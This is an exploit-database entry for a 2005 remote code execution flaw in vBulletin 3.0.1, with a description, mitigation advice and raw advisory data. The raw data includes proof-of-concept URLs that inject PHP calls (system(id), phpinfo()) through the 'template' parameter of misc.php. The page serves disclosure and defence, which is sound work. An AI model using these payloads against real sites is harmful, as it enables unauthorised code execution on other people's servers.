header-logo
Suggest Exploit
vendor:
vBulletin
by:
str0ke
7.5
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: vBulletin
Affected Version From: vBulletin Version 3.0.1
Affected Version To: vBulletin Version 3.0.1
Patch Exists: NO
Related CWE: Unknown
CPE: a:vbulletin:vbulletin:3.0.1
Metasploit:
Other Scripts:
Platforms Tested:
2005

vBulletin Version 3.0.1 RCE vulnerability

This exploit allows an attacker to execute arbitrary code on a vBulletin 3.0.1 website by injecting malicious code into the 'template' parameter of the 'misc.php?do=page' URL. The attacker can execute system commands or PHP functions using this vulnerability.

Mitigation:

Upgrade to a patched version of vBulletin or apply a security patch provided by the vendor. Additionally, restrict access to the 'misc.php' file and sanitize user input.
Source

Exploit-DB raw data:

# Tested on vBulletin Version 3.0.1 /str0ke 
# http://www.xxx.net/misc.php?do=page&template={${system(id)}} 
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}

# milw0rm.com [2005-02-22]

Navigation

Suggest Exploit

Services By CQR